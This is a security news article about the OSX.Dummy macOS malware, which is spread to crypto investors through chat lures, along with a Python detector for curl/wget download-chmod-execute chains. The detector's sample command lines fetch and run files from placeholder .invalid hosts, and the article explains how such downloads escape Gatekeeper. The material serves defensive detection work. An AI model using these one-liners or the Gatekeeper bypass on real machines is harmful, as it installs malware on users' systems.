Crypto Investors on Slack and Discord: Beware the OSX.Dummy Malware

Security researchers have detailed how attackers are pushing a piece of macOS malware known as OSX.Dummy to cryptocurrency investors through the Slack and Discord chat platforms. The criminals impersonate admins or other trusted members of crypto-related chat groups and talk users into running a malicious snippet.

The distribution method is not sophisticated, but a compromised system is exposed to remote code execution and to whatever the attackers choose to do with it. According to Digita Security, once the malware connects to the attackers’ command and control server, they can execute arbitrary commands on the infected host as root.

OSX.Dummy, Slack and Discord Chat Platforms – How Attacks Happen

The first researcher to flag the OSX.Dummy malware was Remco Verhoef, who shared his discovery on the SANS InfoSec Handlers Diary blog. This is what he said:

Over the previous days we’ve seen multiple MacOS malware attacks, originating within crypto-related Slack or Discord chat groups by impersonating admins or key people. Small snippets are shared, resulting in downloading and executing a malicious binary.

Users are tricked into pasting and running a short script which downloads the OSX.Dummy binary with cURL, saves it as /tmp/script and executes it. “The file is a large mach064 binary (34M), rating a perfect score of 0/60 on VirusTotal,” the researcher said. The binary is unsigned, yet it runs in spite of macOS Gatekeeper, which is supposed to stop unsigned software downloaded from the internet from being launched.

How is that possible? Gatekeeper only inspects files that carry the quarantine attribute which browsers and other quarantine-aware applications attach to their downloads. A file fetched with cURL from the Terminal and launched from there never receives that attribute, so Gatekeeper is not consulted at all and the unsigned binary simply runs. The built-in protections and mitigations of macOS are therefore not sufficient on their own: a user who pastes a command from a chat into the Terminal has effectively stepped around them.
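Because Gatekeeper never sees a cURL-fetched binary, the realistic place to catch this lure is process or shell telemetry. As an added example (not code from this article, from the SANS diary or from Digita Security), the following Python scans recorded command lines for the pattern described above: a curl or wget download written to a file, a chmod that makes it executable, and the same file being run within the same one-liner. The command lines are constructed samples using the reserved .invalid domain; none is the actual snippet used in the campaign.

```python
import re
import shlex

# Constructed sample command lines, in the shape an endpoint agent or shell
# audit log records them. None is the actual snippet used in the campaign;
# the hosts use the reserved .invalid TLD.
SAMPLE_COMMANDS = [
    "cd /tmp && curl -s http://example.invalid/payload > script && chmod +x script && ./script",
    "curl -sL http://example.invalid/x -o /private/tmp/x; chmod 755 /private/tmp/x; /private/tmp/x",
    "curl -s https://api.example.invalid/status | jq .",
    "wget -q http://example.invalid/tool -O /var/tmp/tool && chmod +x /var/tmp/tool && /var/tmp/tool --help",
    "ls -la /tmp",
]

# Octal modes (755) or symbolic modes (+x, u+rwx) as passed to chmod.
CHMOD_MODE = re.compile(r"[0-7]{3,4}|[ugoa]*[+=-][rwxXst]+")


def _segments(cmdline):
    """Split a one-liner on the control operators (&&, ||, ;, |) the lure chains commands with."""
    return [s.strip() for s in re.split(r"&&|\|\||;|\|", cmdline) if s.strip()]


def _basename(path):
    return path.rsplit("/", 1)[-1]


def detect_download_and_exec(cmdline):
    """Return the basenames of files that one command line downloads, marks executable and runs.

    A curl/wget-fetched file carries no com.apple.quarantine attribute, so
    Gatekeeper is never consulted; process telemetry is where this gets caught.
    """
    downloaded = set()
    executable = set()
    hits = []
    for seg in _segments(cmdline):
        try:
            argv = shlex.split(seg)
        except ValueError:          # unbalanced quotes: not a parseable segment
            continue
        if not argv:
            continue
        prog = _basename(argv[0])
        if prog in ("curl", "wget"):
            # The file lands via -o/-O/--output or a shell redirect; ">" survives
            # shlex.split as an ordinary word. For curl -O the remote name is used,
            # which is the URL basename when the URL directly follows the flag.
            for i, tok in enumerate(argv):
                if tok in ("-o", "-O", "--output", ">") and i + 1 < len(argv):
                    downloaded.add(_basename(argv[i + 1]))
        elif prog == "chmod":
            for tok in argv[1:]:
                if tok.startswith("-") or CHMOD_MODE.fullmatch(tok):
                    continue            # skip options and the mode itself
                executable.add(_basename(tok))
        elif prog in downloaded and prog in executable:
            hits.append(prog)           # ./script, /tmp/script, etc. being launched
    return hits


def scan(commands):
    """Map each suspicious command line to the files it fetches and then executes."""
    findings = {}
    for cmd in commands:
        hits = detect_download_and_exec(cmd)
        if hits:
            findings[cmd] = hits
    return findings


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        print(f"download-and-execute of {hits}: {cmd}")
```

The match is deliberately on the chain of actions rather than on any particular hostname or filename, since those are the parts of the lure an attacker changes for free; a plain API call piped into jq, as in the third sample, does not trigger it.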

